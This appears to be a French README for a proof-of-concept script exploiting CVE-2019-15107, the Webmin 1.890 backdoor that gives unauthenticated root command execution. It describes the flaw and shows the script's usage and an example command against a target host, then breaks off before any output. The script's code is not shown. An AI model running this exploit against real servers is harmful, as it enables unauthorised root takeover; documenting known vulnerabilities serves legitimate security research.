
Exploit CVE-2019-15107
La version 1.890 de Webmin a été publiée avec une porte dérobée qui pouvait permettre à toute personne en ayant connaissance d'exécuter des commandes en tant que root. Les versions 1.900 à 1.920 contenaient également une porte dérobée utilisant un code similaire, mais celle-ci n'était pas exploitable dans une installation Webmin par défaut. Seulement si l'administrateur avait activé la fonctionnalité dans Webmin -> Configuration Webmin -> Authentification pour autoriser le changement des mots de passe expirés, un attaquant pouvait l'utiliser.
Vous avez besoin de pip3 pour installer ces paquets.
$ python3 Webmin_exploit.py --help
usage: Webmin_exploit.py [-h] -host IP [-port Port] [-cmd Command]
Webmin 1.890 expired Remote Root POC
optional arguments:
-h, --help show this help message and exit
-host IP Host to attack
-port Port Port of the host ~ 10000 is Default
-cmd Command Command to execute ~ id is Default
python3 Webmin_exploit.py -host target -port 10000 -cmd id
$ python3 Webmin_exploit.py -host target -port 10000 -cmd id
[